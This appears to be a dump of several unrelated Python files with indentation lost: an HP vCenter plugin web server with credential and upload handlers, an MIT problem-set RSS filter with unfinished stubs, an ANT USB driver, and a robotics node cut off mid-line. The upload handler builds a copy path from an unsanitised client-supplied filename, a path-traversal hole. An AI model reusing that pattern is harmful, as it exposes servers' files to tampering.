for host in prop.val[0]:
mob = host._type + ':' + host.value
h = self.get_host(serverGuid, mob)
if h :
hosts.append(h)
return hosts
def GET(self):
q = web.input()
if not hasattr(q, 'moref') or q.moref == '':
raise web.badrequest()
if not hasattr(q, 'serverGuid') or q.serverGuid == '':
raise web.badrequest()
log.debug("firmware_jobs GET %s", q.moref)
if q.moref.split(':')[0] == 'HostSystem':
item = self.get_host(q.serverGuid, q.moref)
if not item:
raise web.notfound()
# Check to see if the firmware object has been created. Create it if not.
try:
fw = getattr(item, 'host_firmware')
except AttributeError:
setattr(item, 'host_firmware', HostFirmware(item, q.serverGuid))
elif q.moref.split(':')[0] == 'ClusterComputeResource':
item = self.get_hosts(q.serverGuid, q.moref)
for host in item:
try:
fw = getattr(host, 'host_firmware')
except AttributeError:
setattr(host, 'host_firmware', HostFirmware(host, q.serverGuid))
else:
raise web.notfound()
if item:
web.header('Content-Type', 'text/javascript')
web.http.expires(0)
if q.moref.split(':')[0] == 'ClusterComputeResource':
data = []
for host in item:
if host:
i = {}
i['Host'] = host.name
i['FirmwareJobs'] = host.host_firmware.get_firmware_jobs()
data.append(i)
return json.dumps(data)
else:
jobs = item.host_firmware.get_firmware_jobs()
return json.dumps(jobs)
else:
raise web.notfound()
class smart_components:
def GET(self):
log.debug("smart_components GET")
q = web.input()
web.header('Content-Type', 'text/javascript')
web.http.expires(0)
scm = get_scm()
obj = {
'components': scm.json()
}
return json.dumps(obj)
def POST(self):
# We have to use the text/html type here even though the format is json. This is so that
# we can load the data in a hidden frame and parse it as javascript.
web.header('Content-Type', 'text/html')
web.http.expires(0)
inputdata = json.loads(web.data())
log.debug("smart_components POST %s", inputdata['filename'])
# This is key - make sure we don't treat binary files as unicode. Also make sure to
# use the binary file mode (wb) when writing the file.
obj = {}
try:
filename = inputdata['filename']
scm = get_scm()
if not os.path.exists('static/sc_share'):
os.makedirs('static/sc_share')
import shutil
shutil.copyfile('../uim/static/sc_share/' + filename, 'static/sc_share/' + filename)
scm.add_component(filename)
obj['status'] = '0'
obj['message'] = 'Component upload successful'
obj['components'] = scm.json()
except Exception as err:
log.exception("Error saving smart component '%s'", inputdata)
obj['status'] = '-1'
obj['message'] = 'Component upload failed: '+str(err)
return json.dumps(obj)
def DELETE(self):
web.header('Content-Type', 'text/javascript')
web.http.expires(0)
input = json.loads(web.data())
q = web.input()
if not 'sc_filename' in input:
raise web.badrequest()
log.debug("smart_components DELETE %s", input['sc_filename'])
scm = get_scm()
scm.delete_component(input['sc_filename'])
obj = {
'components': scm.json()
}
return json.dumps(obj)
class Settings:
def parse_data(self):
op = ''
obj = {}
        data = web.data().split('&')
        for item in data:
            # Split only on the first '=' so values containing '=' survive,
            # and skip fragments that are not key=value pairs.
            kv = item.split('=', 1)
            if len(kv) != 2:
                continue
            kv[1] = kv[1].replace('+', ' ')
            if kv[0] == 'oper':
                op = unquote(kv[1])
            else:
                obj[kv[0]] = unquote(kv[1])
return op, obj
def GET(self, service):
if service == 'config':
cfg = config()
srvcfg = cfg.get_server_config()
data = []
data.append({'param_name': 'HP SIM Port', 'param_value': srvcfg['hpsim']['port']})
data.append({'param_name': 'Device Poll Interval', 'param_value': srvcfg['device_poll']})
data.append({'param_name': 'Event Poll Interval', 'param_value': srvcfg['event_poll']})
data.append({'param_name': 'Power Cost', 'param_value': srvcfg['power_cost']})
data.append({'param_name': 'Virtual Connect Uplink Over Subscription Factor', 'param_value': srvcfg.get('bottleneck_oversub', '1.2')})
return json.dumps({'srvcfg' : data})
elif service == 'hostproperties':
hostpw = None
ilopw = None
dc = Collector.get_collector()
iloaddr = dc.server.get('data', {}).get('summary',{}).get('iLOAddress', None) if dc.server else None
if not iloaddr:
iloaddr = dc.ilo.get('address', {}).get('ipv4', None) if dc.ilo else None
if not iloaddr:
iloaddr = getattr(dc.host,'associated_ilo', None)
vmwhost = getattr(dc.host_detail, 'name', None)
#csce = catalog.lookup('engines.csc_engine')
#if iloaddr:
# ilopw = csce.get_password('', 'iLO', iloaddr)
#if vmwhost:
# hostpw = csce.get_password('', 'ProLiant Server', vmwhost)
if iloaddr:
ilopw = self.find_pw_for_host_and_type(iloaddr, 'iLO')
if not ilopw:
ilopw = self.find_global_pw('iLO')
if vmwhost:
hostpw = self.find_pw_for_host_and_type(vmwhost, 'ProLiant Server')
if not hostpw:
hostpw = self.find_global_pw('ProLiant Server')
pwlist = []
if ilopw:
pwlist.append({'host': ilopw['host'], 'username': ilopw['username'], 'password': '', 'type': 'iLO'})
else:
pwlist.append({'host': iloaddr, 'username': '', 'password': '', 'type': 'iLO'})
if hostpw:
pwlist.append({'host': hostpw['host'], 'username': hostpw['username'], 'password': '', 'type': 'ProLiant Server'})
else:
pwlist.append({'host': vmwhost, 'username': '', 'password': '', 'type': 'ProLiant Server'})
return json.dumps({'hostprop': pwlist})
elif service == 'clusterproperties':
cprops = []
cprops.append({'username': '', 'password': '', 'type': 'iLO'})
return json.dumps({'clusterprop': cprops})
elif service == 'password':
csce = catalog.lookup('engines.csc_engine')
pwlist = csce.get_passwords()
pwlist = [pw for pw in pwlist if (pw['type'] not in ('HP Common Services', 'vCenter'))]
return json.dumps(pwlist)
def find_pw_in_cspw_list(self, data):
csce = catalog.lookup('engines.csc_engine')
pwlist = csce.get_passwords()
for pw in pwlist:
if (data.has_key('id') and pw['id'] == data['id']) or \
(data.has_key('username') and pw['username'] == data['username'] and \
data.has_key('type') and pw['type'] == data['type'] and \
data.has_key('host') and pw['host'] == data['host'] ):
return pw
return None
def find_pw_for_host_and_type(self, host, pwtype):
csce = catalog.lookup('engines.csc_engine')
pwlist = csce.get_passwords()
log.debug('looking for password %s, %s', host, pwtype)
for pw in pwlist:
if (pw['type'] == pwtype and pw['host'] == host ):
return pw
return None
def find_global_pw(self, pwtype):
csce = catalog.lookup('engines.csc_engine')
pwlist = csce.get_passwords()
for pw in pwlist:
if ( pw['type'] == pwtype and pw['host'] == '*' ):
return pw
return None
def pwtype_exists(self, pwtype):
csce = catalog.lookup('engines.csc_engine')
pwlist = csce.get_passwords()
for pw in pwlist:
if (pw['type'] == pwtype):
return pw
return None
def POST(self, service):
runAfterSavingConfig = []
oper, data = self.parse_data()
if service in ('password', 'vcpassword'):
csce = catalog.lookup('engines.csc_engine')
vce = catalog.lookup('ic4vc-vc_engine')
if oper == 'del':
log.debug("****Credential DEL")
pw = self.find_pw_in_cspw_list(data)
if pw:
csce.del_password_from_cs(pw['id'], pw['username'], pw['type'], pw['host'])
if pw['type'] == 'vCenter':
vce.delete_vc(pw)
else :
log.error('Error deleting credential: Unable to find credential')
raise web.notfound('Unable to find credential.')
elif oper == 'edit':
log.debug("Credential EDIT")
pw = self.find_pw_in_cspw_list(data) # edit DOES NOT WORK because if the username is changed it will not find the cred
if pw:
if data['password'] != '****************' and data['password'].strip() !='' :
csce.update_password(pw['id'], data['username'], data['password'], data['type'], data['host'])
if pw['type'] == 'vCenter':
vce.edit_vc(data)
else:
log.error('Error editing credential: No Password')
raise web.forbidden(data='The password must be set.')
else:
log.error("Error editing credential: not found")
raise web.notfound('Unable to find credential.')
elif oper == 'add':
log.debug("Credential ADD")
if data['type'] == 'HP SIM':
pw = self.pwtype_exists(data['type'])
if pw:
log.error("Error adding credential: Only one HP SIM credential allowed")
raise web.forbidden(data = 'Only one HP SIM entry is allowed')
pw = self.find_pw_in_cspw_list(data)
if not pw:
try :
csce.add_password_to_cs(data['username'], data['password'], data['type'], data['host'])
except:
log.exception("Error adding credential: Error adding credential for vCenter %s", data['host'])
raise web.internalerror("Error adding credential")
else:
log.error("Error adding credential: Credential already exists")
raise web.conflict('Credential already exists.')
if data['type'] == 'vCenter':
runAfterSavingConfig.append( (vce.add_vc, (data,)) )
else:
log.error("Error in editing credential: operation '%s' not supported.", oper)
raise web.notfound('Operation Not Supported')
if oper != 'del':
if data['type'] == 'HP SIM':
runAfterSavingConfig.append( (ALDeploymentConnector.create, tuple() ) )
if data['type'] == 'iLO' and data['host'] != '*':
csce.associate_ilo(data['host'])
#log.debug(data)
elif service == 'config':
if oper == 'edit':
cfg = config()
srvcfg = cfg.get_server_config()
if data['param_name'] == 'HP SIM Port':
srvcfg['hpsim']['port'] = data['param_value']
runAfterSavingConfig.append( (ALDeploymentConnector.create, tuple() ) )
elif data['param_name'] == 'Device Poll Interval':
srvcfg['device_poll'] = data['param_value']
elif data['param_name'] == 'Event Poll Interval':
srvcfg['event_poll'] = data['param_value']
elif data['param_name'] == 'Power Cost':
srvcfg['power_cost'] = data['param_value']
elif data['param_name'] == 'Virtual Connect Uplink Over Subscription Factor':
srvcfg['bottleneck_oversub'] = data['param_value']
cfg.set_server_config(srvcfg)
else:
log.error("Error editing config: operation '%s' not supported.", oper)
raise web.notfound('This operation is not supported')
elif service == 'hostproperties':
if oper == 'edit':
if data['host'] != '*' and data['password'] != '****************' and data['password'].strip() !='' :
dc = Collector.get_collector()
if dc.host:
csce = catalog.lookup('engines.csc_engine')
vce = catalog.lookup('ic4vc-vc_engine')
csce.add_password_to_cs(data['username'], data['password'], data['type'], data['host'])
if data['type'] == 'iLO':
csce.associate_ilo(data['host'])
setattr(dc.host, 'associated_ilo', data['host'])
else:
log.error("Error editing host properties: host has not been discovered yet.")
raise web.notfound('Host has not been discovered yet.')
else:
if data['host'] == '*' :
log.error("Error editing host properties: host=* Cannot set global from host.")
raise web.forbidden(data='Global credentials cannot be set here.')
elif data['password'] == '****************' or data['password'].strip() == '' :
log.error("Error setting host properties - password is blank or *.")
raise web.forbidden(data='The password must be set.')
else :
log.error("Error editing host properties - unknown error.")
raise web.forbidden(data='Error editing host properties.')
else:
log.error("Error in editing host properties: operation '%s' not supported.", oper)
raise web.notfound('This operation is not supported')
elif service == 'clusterproperties':
log.debug('clusterproperties')
if oper == 'edit':
log.debug('clusterproperties edit')
if data['password'] != '****************' and data['password'].strip() !='' and data['username'].strip() != '' :
dc = ClusterCollector.get_collector()
csce = catalog.lookup('engines.csc_engine')
if data['type'] == 'iLO':
log.debug('clusterproperties edit iLO')
creds_set = 0
if not len(dc.hosts) :
log.error("Error editing cluster properties: Cluster %s is empty", dc.cluster.name)
raise web.notfound("No hosts in this cluster.")
for host in dc.hosts :
log.debug("Cluster Properties setting credentials for host '%s'", host.name)
iloaddress = dc.ilo_address(host.hardware.systemInfo.uuid)
if iloaddress:
csce.add_password_to_cs(data['username'], data['password'], data['type'], iloaddress)
creds_set+=1
else :
log.error("Error editing cluster properties: No iLO address for host '%s'", host.name)
if not creds_set :
log.error('Error editing cluster properties: No hosts set of %d.', len(dc.hosts) )
raise web.notfound('Unable to set any hosts.')
if creds_set != len(dc.hosts) :
log.error('Error editing cluster properties: Only set %d of %d hosts.', creds_set, len(dc.hosts) )
raise web.notfound('Only set %d of %d hosts.' % (creds_set, len(dc.hosts)))
else :
log.error("Error in editing cluster properties: type '%s' not supported.", data['type'])
raise web.notfound('This type is not supported')
else:
if data['username'].strip() == '' :
log.error("Error editing cluster properties: username is blank.")
raise web.forbidden(data='Username cannot be blank.')
elif data['password'] == '****************' or data['password'].strip() == '' :
log.error("Error setting cluster properties - password is blank or *.")
raise web.forbidden(data='The password must be set.')
else :
log.error("Error editing cluster properties - unknown error.")
raise web.forbidden(data='Error editing cluster properties.')
else:
log.error("Error in editing cluster properties: operation '%s' not supported.", oper)
raise web.notfound('This operation is not supported')
else:
log.error("Error in Settings: service '%s' not supported", service)
raise web.notfound('Service not supported')
taskQ = catalog.lookup('ic4vc-server-threadpool').get_q()
for f in runAfterSavingConfig:
taskQ.put(f)
return
class mywebapp(web.application):
def run(self, certinfo, server_address=('0.0.0.0', 8080), timeout=900, rqs=10, nthreads=20, *middleware):
func = self.wsgifunc(*middleware)
altaddress = ('localhost', server_address[1])
self.server = CherryPyWSGIServer(altaddress, func, timeout=timeout, request_queue_size=rqs, numthreads=nthreads)
self.server.thread_name = 'HPIC4VCServer'
log.info('https://%s:%d/' % altaddress)
try:
self.server.start()
except KeyboardInterrupt:
self.server.stop()
class ServerWebApp:
def __init__(self):
self.cfg = config()
self.server_cfg = self.cfg.get_server_config()
self.server_root = self.cfg.get_server_root()
self.server_url = urlparse(self.server_root)
self.proto = self.server_url.scheme
log.debug(self.server_url.port)
self.server_address = (self.server_url.hostname, self.server_url.port)
catalog.insert(self, 'ServerWebApp')
def start_collection(self, handler):
try:
portlets.collector.remove_old_collectors()
q = web.input()
if hasattr(q, 'moref'):
if q.moref.startswith('HostSystem'):
Collector.get_collector()
elif q.moref.startswith('ClusterComputeResource'):
ClusterCollector.get_collector()
except:
log.exception('error start_collection')
return handler()
def start(self):
self.mywebappthread = Thread(name='server-ServerWebApp', target=self.startmywebapp)
self.mywebappthread.daemon = True
self.mywebappthread.start()
def startmywebapp(self):
self.app = mywebapp(urls, globals())
timeout = int(self.server_cfg.get('webserver', {}).get('timeout', 60))
rqs = int(self.server_cfg.get('webserver', {}).get('req_queue', 10))
nthreads = int(self.server_cfg.get('webserver', {}).get('num_threads', 20))
self.app.add_processor(self.start_collection)
self.app.run(self.cfg.get_cert_info(), self.server_address, timeout = timeout, rqs=rqs, nthreads=nthreads)
def stop(self):
# This is where you will need to do all the cleanup
self.app.server.stop()
def start():
cfg = config()
server_root = cfg.get_server_root()
server_url = urlparse(server_root)
server_address = (server_url.hostname, server_url.port)
app = mywebapp(urls, globals())
app.run(cfg.get_cert_info(), server_address)
if (__name__ == '__main__'):
app = web.application(urls, globals())
session = web.session.Session(app, web.session.DiskStore('sessions'), initializer={})
app.run()
|
ps5.py
|
# 6.0001/6.00 Problem Set 5 - RSS Feed Filter
# Name:
# Collaborators:
# Time:
import feedparser
import string
import time
import threading
from project_util import translate_html
from mtTkinter import *
from datetime import datetime
import pytz
#-----------------------------------------------------------------------
#======================
# Code for retrieving and parsing
# Google and Yahoo News feeds
# Do not change this code
#======================
def process(url):
"""
Fetches news items from the rss url and parses them.
Returns a list of NewsStory-s.
"""
feed = feedparser.parse(url)
entries = feed.entries
ret = []
for entry in entries:
guid = entry.guid
title = translate_html(entry.title)
link = entry.link
description = translate_html(entry.description)
pubdate = translate_html(entry.published)
try:
            pubdate = datetime.strptime(pubdate, "%a, %d %b %Y %H:%M:%S %Z")
            # datetime.replace returns a new object, so assign the result --
            # otherwise the tzinfo is silently discarded.
            pubdate = pubdate.replace(tzinfo=pytz.timezone("GMT"))
# pubdate = pubdate.astimezone(pytz.timezone('EST'))
# pubdate.replace(tzinfo=None)
except ValueError:
pubdate = datetime.strptime(pubdate, "%a, %d %b %Y %H:%M:%S %z")
newsStory = NewsStory(guid, title, description, link, pubdate)
ret.append(newsStory)
return ret
#======================
# Data structure design
#======================
# Problem 1
class NewsStory(object):
def __init__(self, guid, title, description, link, pubdate):
self.guid = guid
self.title = title
self.description = description
self.link = link
self.pubdate = pubdate
def get_guid(self):
return self.guid
def get_title(self):
return self.title
def get_description(self):
return self.description
def get_link(self):
return self.link
def get_pubdate(self):
return self.pubdate
#======================
# Triggers
#======================
class Trigger(object):
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
# DO NOT CHANGE THIS!
raise NotImplementedError
# PHRASE TRIGGERS
# Problem 2
# TODO: PhraseTrigger
class PhraseTrigger(Trigger):
def __init__(self, phrase):
self.phrase = phrase.lower()
def is_phrase_in(self, text):
# Replaces punctuation with ' '
for char in string.punctuation:
text = text.lower().replace(char, ' ')
# Converts text to a list by splitting between spaces and getting rid of blanks
textList = text.split(' ')
textList = [i for i in textList if not i == '']
phraseList = self.phrase.split(' ')
# Check each index in textList to see if the phrase is there
for idx in range(0, len(textList) - len(phraseList) + 1):
if textList[idx:idx+len(phraseList)] == phraseList:
return True
return False
# Problem 3
# TODO: TitleTrigger
class TitleTrigger(PhraseTrigger):
def evaluate(self, newsStory):
return self.is_phrase_in(newsStory.get_title())
# Problem 4
# TODO: DescriptionTrigger
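# A minimal sketch of the trigger described above (an assumption about the
# intended solution, mirroring TitleTrigger; main_thread below expects a
# class with this name):
class DescriptionTrigger(PhraseTrigger):
    def evaluate(self, newsStory):
        return self.is_phrase_in(newsStory.get_description())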
# TIME TRIGGERS
# Problem 5
# TODO: TimeTrigger
# Constructor:
# Input: Time has to be in EST and in the format of "%d %b %Y %H:%M:%S".
# Convert time from string to a datetime before saving it as an attribute.
# Problem 6
# TODO: BeforeTrigger and AfterTrigger
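# Minimal sketches of the time triggers described above (assumptions about
# the intended solutions; localizing naive pubdates to EST is a judgment call):
class TimeTrigger(Trigger):
    def __init__(self, time_string):
        est = pytz.timezone("EST")
        self.time = est.localize(datetime.strptime(time_string, "%d %b %Y %H:%M:%S"))
class BeforeTrigger(TimeTrigger):
    def evaluate(self, story):
        pubdate = story.get_pubdate()
        if pubdate.tzinfo is None:
            pubdate = pytz.timezone("EST").localize(pubdate)
        return pubdate < self.time
class AfterTrigger(TimeTrigger):
    def evaluate(self, story):
        pubdate = story.get_pubdate()
        if pubdate.tzinfo is None:
            pubdate = pytz.timezone("EST").localize(pubdate)
        return pubdate > self.time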
# COMPOSITE TRIGGERS
# Problem 7
# TODO: NotTrigger
# Problem 8
# TODO: AndTrigger
# Problem 9
# TODO: OrTrigger
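# Minimal sketches of the composite triggers described above (assumptions
# about the intended solutions; main_thread below expects AndTrigger):
class NotTrigger(Trigger):
    def __init__(self, trigger):
        self.trigger = trigger
    def evaluate(self, story):
        return not self.trigger.evaluate(story)
class AndTrigger(Trigger):
    def __init__(self, trigger1, trigger2):
        self.trigger1 = trigger1
        self.trigger2 = trigger2
    def evaluate(self, story):
        return self.trigger1.evaluate(story) and self.trigger2.evaluate(story)
class OrTrigger(Trigger):
    def __init__(self, trigger1, trigger2):
        self.trigger1 = trigger1
        self.trigger2 = trigger2
    def evaluate(self, story):
        return self.trigger1.evaluate(story) or self.trigger2.evaluate(story)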
#======================
# Filtering
#======================
# Problem 10
def filter_stories(stories, triggerlist):
"""
Takes in a list of NewsStory instances.
Returns: a list of only the stories for which a trigger in triggerlist fires.
"""
# TODO: Problem 10
# This is a placeholder
# (we're just returning all the stories, with no filtering)
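    # A one-line sketch of the intended filtering (an assumption: keep a story
    # when any trigger in triggerlist fires):
    # return [s for s in stories if any(trig.evaluate(s) for trig in triggerlist)]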
return stories
#======================
# User-Specified Triggers
#======================
# Problem 11
def read_trigger_config(filename):
"""
filename: the name of a trigger configuration file
Returns: a list of trigger objects specified by the trigger configuration
file.
"""
# We give you the code to read in the file and eliminate blank lines and
# comments. You don't need to know how it works for now!
trigger_file = open(filename, 'r')
lines = []
for line in trigger_file:
line = line.rstrip()
if not (len(line) == 0 or line.startswith('//')):
lines.append(line)
# TODO: Problem 11
# line is the list of lines that you need to parse and for which you need
# to build triggers
print(lines) # for now, print it so you see what it contains!
SLEEPTIME = 120 #seconds -- how often we poll
def main_thread(master):
# A sample trigger list - you might need to change the phrases to correspond
# to what is currently in the news
try:
t1 = TitleTrigger("election")
t2 = DescriptionTrigger("Trump")
t3 = DescriptionTrigger("Clinton")
t4 = AndTrigger(t2, t3)
triggerlist = [t1, t4]
# Problem 11
# TODO: After implementing read_trigger_config, uncomment this line
# triggerlist = read_trigger_config('triggers.txt')
# HELPER CODE - you don't need to understand this!
# Draws the popup window that displays the filtered stories
# Retrieves and filters the stories from the RSS feeds
frame = Frame(master)
frame.pack(side=BOTTOM)
scrollbar = Scrollbar(master)
scrollbar.pack(side=RIGHT,fill=Y)
t = "Google & Yahoo Top News"
title = StringVar()
title.set(t)
ttl = Label(master, textvariable=title, font=("Helvetica", 18))
ttl.pack(side=TOP)
cont = Text(master, font=("Helvetica",14), yscrollcommand=scrollbar.set)
cont.pack(side=BOTTOM)
cont.tag_config("title", justify='center')
button = Button(frame, text="Exit", command=root.destroy)
button.pack(side=BOTTOM)
guidShown = []
def get_cont(newstory):
if newstory.get_guid() not in guidShown:
cont.insert(END, newstory.get_title()+"\n", "title")
cont.insert(END, "\n---------------------------------------------------------------\n", "title")
cont.insert(END, newstory.get_description())
cont.insert(END, "\n*********************************************************************\n", "title")
guidShown.append(newstory.get_guid())
while True:
print("Polling . . .", end=' ')
# Get stories from Google's Top Stories RSS news feed
stories = process("http://news.google.com/news?output=rss")
# Get stories from Yahoo's Top Stories RSS news feed
stories.extend(process("http://news.yahoo.com/rss/topstories"))
stories = filter_stories(stories, triggerlist)
list(map(get_cont, stories))
scrollbar.config(command=cont.yview)
print("Sleeping...")
time.sleep(SLEEPTIME)
except Exception as e:
print(e)
if __name__ == '__main__':
root = Tk()
root.title("Some RSS parser")
t = threading.Thread(target=main_thread, args=(root,))
t.start()
root.mainloop()
|
ant.py
|
# Ant
#
# Copyright (c) 2012, Gustav Tiger <gustav@tiger.name>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import array
import collections
import struct
import threading
import time
import Queue
import logging
import usb
from message import Message
from commons import format_list
from driver import find_driver
_logger = logging.getLogger("garmin.ant.base.ant")
class Ant():
_RESET_WAIT = 1
def __init__(self):
self._driver = find_driver()
self._message_queue_cond = threading.Condition()
self._message_queue = collections.deque()
self._events = Queue.Queue()
self._buffer = array.array('B', [])
self._burst_data = array.array('B', [])
self._last_data = array.array('B', [])
self._running = True
self._driver.open()
self._worker_thread = threading.Thread(target=self._worker, name="ant.base")
self._worker_thread.start()
self.reset_system()
def start(self):
self._main()
def stop(self):
if self._running:
_logger.debug("Stoping ant.base")
self._running = False
self._worker_thread.join()
def _on_broadcast(self, message):
self._events.put(('event', (message._data[0],
Message.Code.EVENT_RX_BROADCAST, message._data[1:])))
def _on_acknowledge(self, message):
self._events.put(('event', (message._data[0],
Message.Code.EVENT_RX_ACKNOWLEDGED, message._data[1:])))
def _on_burst_data(self, message):
sequence = message._data[0] >> 5
channel = message._data[0] & 0b00011111
data = message._data[1:]
# First sequence
if sequence == 0:
self._burst_data = data
# Other
else:
self._burst_data.extend(data)
# Last sequence (indicated by bit 3)
if sequence & 0b100 != 0:
self._events.put(('event', (channel,
Message.Code.EVENT_RX_BURST_PACKET, self._burst_data)))
def _worker(self):
_logger.debug("Ant runner started")
while self._running:
try:
message = self.read_message()
                if message is None:
break
# TODO: flag and extended for broadcast, acknowledge, and burst
# Only do callbacks for new data. Resent data only indicates
# a new channel timeslot.
if not (message._id == Message.ID.BROADCAST_DATA and
message._data == self._last_data):
# Notifications
if message._id in [Message.ID.STARTUP_MESSAGE, \
Message.ID.SERIAL_ERROR_MESSAGE]:
self._events.put(('response', (None, message._id,
message._data)))
# Response (no channel)
elif message._id in [Message.ID.RESPONSE_VERSION, \
Message.ID.RESPONSE_CAPABILITIES, \
Message.ID.RESPONSE_SERIAL_NUMBER]:
self._events.put(('response', (None, message._id,
message._data)))
# Response (channel)
elif message._id in [Message.ID.RESPONSE_CHANNEL_STATUS, \
Message.ID.RESPONSE_CHANNEL_ID]:
self._events.put(('response', (message._data[0],
message._id, message._data[1:])))
# Response (other)
elif (message._id == Message.ID.RESPONSE_CHANNEL \
and message._data[1] != 0x01):
self._events.put(('response', (message._data[0],
message._data[1], message._data[2:])))
# Channel event
elif message._id == Message.ID.BROADCAST_DATA:
self._on_broadcast(message)
elif message._id == Message.ID.ACKNOWLEDGE_DATA:
self._on_acknowledge(message)
elif message._id == Message.ID.BURST_TRANSFER_DATA:
self._on_burst_data(message)
elif message._id == Message.ID.RESPONSE_CHANNEL:
_logger.debug("Got channel event, %r", message)
self._events.put(('event', (message._data[0],
message._data[1], message._data[2:])))
else:
_logger.warning("Got unknown message, %r", message)
else:
_logger.debug("No new data this period")
# Send messages in queue, on indicated time slot
if message._id == Message.ID.BROADCAST_DATA:
time.sleep(0.1)
_logger.debug("Got broadcast data, examine queue to see if we should send anything back")
if self._message_queue_cond.acquire(blocking=False):
while len(self._message_queue) > 0:
m = self._message_queue.popleft()
self.write_message(m)
_logger.debug(" - sent message from queue, %r", m)
if(m._id != Message.ID.BURST_TRANSFER_DATA or \
m._data[0] & 0b10000000):# or m._data[0] == 0):
break
else:
_logger.debug(" - no messages in queue")
self._message_queue_cond.release()
self._last_data = message._data
except usb.USBError as e:
_logger.warning("%s, %r", type(e), e.args)
_logger.debug("Ant runner stopped")
def _main(self):
while self._running:
try:
(event_type, event) = self._events.get(True, 1.0)
self._events.task_done()
(channel, event, data) = event
if event_type == 'response':
self.response_function(channel, event, data)
elif event_type == 'event':
self.channel_event_function(channel, event, data)
else:
_logger.warning("Unknown message typ '%s': %r", event_type, event)
except Queue.Empty as e:
pass
def write_message_timeslot(self, message):
with self._message_queue_cond:
self._message_queue.append(message)
def write_message(self, message):
data = message.get()
self._driver.write(data)
_logger.debug("Write data: %s", format_list(data))
def read_message(self):
while self._running:
# If we have a message in buffer already, return it
if len(self._buffer) >= 5 and len(self._buffer) >= self._buffer[1] + 4:
packet = self._buffer[:self._buffer[1] + 4]
self._buffer = self._buffer[self._buffer[1] + 4:]
return Message.parse(packet)
# Otherwise, read some data and call the function again
else:
data = self._driver.read()
self._buffer.extend(data)
if data:
_logger.debug("Read data: %s (now have %s in buffer)",
format_list(data), format_list(self._buffer))
# Ant functions
def unassign_channel(self, channel):
pass
def assign_channel(self, channel, channelType, networkNumber):
message = Message(Message.ID.ASSIGN_CHANNEL, [channel, channelType, networkNumber])
self.write_message(message)
def open_channel(self, channel):
message = Message(Message.ID.OPEN_CHANNEL, [channel])
self.write_message(message)
def set_channel_id(self, channel, deviceNum, deviceType, transmissionType):
data = array.array('B', struct.pack("<BHBB", channel, deviceNum, deviceType, transmissionType))
message = Message(Message.ID.SET_CHANNEL_ID, data)
self.write_message(message)
def set_channel_period(self, channel, messagePeriod):
data = array.array('B', struct.pack("<BH", channel, messagePeriod))
message = Message(Message.ID.SET_CHANNEL_PERIOD, data)
self.write_message(message)
def set_channel_search_timeout(self, channel, timeout):
message = Message(Message.ID.SET_CHANNEL_SEARCH_TIMEOUT, [channel, timeout])
self.write_message(message)
def set_channel_rf_freq(self, channel, rfFreq):
message = Message(Message.ID.SET_CHANNEL_RF_FREQ, [channel, rfFreq])
self.write_message(message)
def set_network_key(self, network, key):
message = Message(Message.ID.SET_NETWORK_KEY, [network] + key)
self.write_message(message)
# This function is a bit of a mystery. It is mentioned in libgant,
# http://sportwatcher.googlecode.com/svn/trunk/libgant/gant.h and is
    # also sent from the official ant daemon on windows.
def set_search_waveform(self, channel, waveform):
message = Message(Message.ID.SET_SEARCH_WAVEFORM, [channel] + waveform)
self.write_message(message)
def reset_system(self):
message = Message(Message.ID.RESET_SYSTEM, [0x00])
self.write_message(message)
time.sleep(self._RESET_WAIT)
def request_message(self, channel, messageId):
message = Message(Message.ID.REQUEST_MESSAGE, [channel, messageId])
self.write_message(message)
def send_acknowledged_data(self, channel, data):
assert len(data) == 8
message = Message(Message.ID.ACKNOWLEDGE_DATA,
array.array('B', [channel]) + data)
self.write_message_timeslot(message)
def send_burst_transfer_packet(self, channel_seq, data, first):
assert len(data) == 8
message = Message(Message.ID.BURST_TRANSFER_DATA,
array.array('B', [channel_seq]) + data)
self.write_message_timeslot(message)
def send_burst_transfer(self, channel, data):
assert len(data) % 8 == 0
_logger.debug("Send burst transfer, chan %s, data %s", channel, data)
packets = len(data) / 8
for i in range(packets):
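            # Sequence numbering: 0 marks the first packet, middle packets
            # cycle 1, 2, 3, and the final packet additionally sets the
            # 0b100 flag (computed below).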
sequence = ((i - 1) % 3) + 1
if i == 0:
sequence = 0
elif i == packets - 1:
sequence = sequence | 0b100
channel_seq = channel | sequence << 5
packet_data = data[i * 8:i * 8 + 8]
_logger.debug("Send burst transfer, packet %d, seq %d, data %s", i, sequence, packet_data)
self.send_burst_transfer_packet(channel_seq, packet_data, first=i==0)
def response_function(self, channel, event, data):
pass
def channel_event_function(self, channel, event, data):
pass
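# Usage sketch (an assumption about the intended pattern: subclass Ant and
# override the two no-op hooks above, then drive the event loop):
# class MyAnt(Ant):
#     def response_function(self, channel, event, data):
#         _logger.info("response %s %s", channel, event)
#     def channel_event_function(self, channel, event, data):
#         _logger.info("event %s %s", channel, event)
# ant = MyAnt()
# ant.start()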
|
vehicle_detection_tracking_node.py
|
#!/usr/bin/env python
import rospy
import cv2
import numpy as np
from vehicle_detection_tracking.Detector import Detector
from vehicle_detection_tracking.Tracker import Tracker
from vehicle_detection_tracking.Introducer import Introducer
from cv_bridge import CvBridge, CvBridgeError
from duckietown_msgs.msg import VehicleDetected, VehicleBoundingBox
from sensor_msgs.msg import CompressedImage, Image
from std_msgs.msg import Int32
from mutex import mutex
import threading
from duckietown_utils.jpg import image_cv_from_jpg
from time import time
class TLD():
def __init__(self):
        self.introduce = False
        pos_dist = neg_dist = None
        try:
            pos_dist = np.load(
                "/home/ubuntu/duckietown/catkin_ws/src/vehicle_detection_tracking/distribution/posDist.npy").tolist()
            neg_dist = np.load(
